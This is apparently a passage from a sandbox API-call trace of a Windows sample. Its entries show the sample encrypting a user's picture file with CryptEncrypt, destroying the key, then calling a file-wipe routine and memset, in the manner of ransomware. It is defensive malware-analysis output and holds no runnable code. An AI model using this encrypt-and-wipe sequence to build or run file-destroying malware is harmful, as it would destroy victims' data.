CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0191.863] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0191.863] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0191.863] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0191.877] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0191.877] CryptEncrypt (in: hKey=0x90af18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x87e820*=0x11ae2, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x87e820*=0x11af0) returned 1 [0191.877] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.877] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.877] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b058 | out: hHeap=0x8a0000) returned 1 [0191.877] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.877] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.877] CharLowerBuffW (in: lpsz="byte[72433]", cchLength=0xb | out: lpsz="byte[72433]") returned 0xb [0191.877] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.878] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.878] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0191.878] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0191.878] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0191.878] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0191.878] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0191.878] CryptEncrypt (in: hKey=0x90af18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xa70af8*, pdwDataLen=0x87e820*=0x11ae2, dwBufLen=0x11af0 | out: pbData=0xa70af8*, pdwDataLen=0x87e820*=0x11af0) returned 1 [0191.879] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.879] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.879] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b058 | out: hHeap=0x8a0000) returned 1 [0191.879] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.879] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.879] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.879] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.879] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0191.879] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defb0 | out: hHeap=0x8a0000) returned 1 [0191.879] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0191.879] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0191.880] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0191.880] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0191.880] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0191.880] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0191.880] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0191.880] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db408 | out: hHeap=0x8a0000) returned 1 [0191.880] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0191.880] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0191.880] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0191.880] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0191.880] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0191.880] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0191.880] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0191.880] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b018 | out: hHeap=0x8a0000) returned 1 [0191.880] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0191.880] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0191.880] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0191.880] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.885] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0191.885] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0191.885] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b018 | out: hHeap=0x8a0000) returned 1 [0191.885] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0191.890] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0191.890] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0191.890] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0191.890] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0191.891] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0191.891] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0191.891] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0191.891] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0191.891] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0191.891] PeekMessageW (in: lpMsg=0x87e9fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e9fc) returned 0 [0191.891] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0191.891] CryptDestroyKey (hKey=0x90af18) returned 1 [0191.891] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0191.891] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0191.891] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0191.891] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee20 | out: hHeap=0x8a0000) returned 1 [0191.891] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0191.892] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0191.892] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0191.892] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0191.892] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0191.892] PeekMessageW (in: lpMsg=0x87eb9c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eb9c) returned 0 [0191.892] PeekMessageW (in: lpMsg=0x87eb9c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eb9c) returned 0 [0191.892] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db408 | out: hHeap=0x8a0000) returned 1 [0191.892] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0191.892] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0191.892] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0191.892] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0191.892] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0191.892] PeekMessageW (in: lpMsg=0x87e9d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e9d4) returned 0 [0191.892] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0191.892] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af18 | out: hHeap=0x8a0000) returned 1 [0191.892] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0191.892] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0191.892] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0191.892] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0191.892] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0191.892] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0191.892] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0191.893] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df168 | out: hHeap=0x8a0000) returned 1 [0191.893] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0191.893] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0191.893] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0191.893] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0191.893] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0191.893] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0191.893] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0191.893] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0191.893] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0191.893] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0191.893] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0191.893] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0191.893] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0191.893] PeekMessageW (in: lpMsg=0x87ecf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ecf4) returned 0 [0191.893] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0191.893] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0191.893] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0191.893] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0191.893] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0191.893] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0191.893] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedf8 | out: hHeap=0x8a0000) returned 1 [0191.894] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0191.894] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0191.894] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0191.894] CryptReleaseContext (hProv=0x9c0c88, dwFlags=0x0) returned 1 [0191.894] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0191.894] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0191.894] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0191.894] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0191.894] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0191.894] FreeLibrary (hLibModule=0x74f20000) returned 1 [0191.894] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0191.894] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df168 | out: hHeap=0x8a0000) returned 1 [0191.894] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0191.894] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af18 | out: hHeap=0x8a0000) returned 1 [0191.894] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0191.894] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0191.894] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0191.894] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0191.894] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0191.895] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0191.895] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0191.895] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0191.895] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def10 | out: hHeap=0x8a0000) returned 1 [0191.895] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0191.896] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0191.896] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0191.896] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\zvOG.jpg", lpFindFileData=0x87eda0 | out: lpFindFileData=0x87eda0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3be77fc0, ftCreationTime.dwHighDateTime=0x1d5e67f, ftLastAccessTime.dwLowDateTime=0xf87ced70, ftLastAccessTime.dwHighDateTime=0x1d5e385, ftLastWriteTime.dwLowDateTime=0xf87ced70, ftLastWriteTime.dwHighDateTime=0x1d5e385, nFileSizeHigh=0x0, nFileSizeLow=0x11ae2, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="zvOG.jpg", cAlternateFileName="")) returned 0x90af58 [0191.896] FindClose (in: hFindFile=0x90af58 | out: hFindFile=0x90af58) returned 1 [0191.896] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0191.896] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0191.896] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dead8 | out: hHeap=0x8a0000) returned 1 [0191.896] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0191.896] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0191.896] CharLowerBuffW (in: lpsz="byte[72418]", cchLength=0xb | out: lpsz="byte[72418]") returned 0xb [0191.897] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0191.897] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0191.897] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0191.897] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0191.897] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0191.897] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0191.897] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x75c90000 [0191.897] FreeLibrary (hLibModule=0x75c90000) returned 1 [0191.897] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0191.897] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0191.897] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0191.897] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debc8 | out: hHeap=0x8a0000) returned 1 [0191.897] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deda8 | out: hHeap=0x8a0000) returned 1 [0191.897] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0191.897] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0191.897] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0191.897] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0191.898] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0191.898] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0191.898] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0191.898] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0191.898] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0191.898] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0191.898] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0191.898] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0191.898] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.898] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.898] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.898] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.898] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.898] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.898] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.898] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, 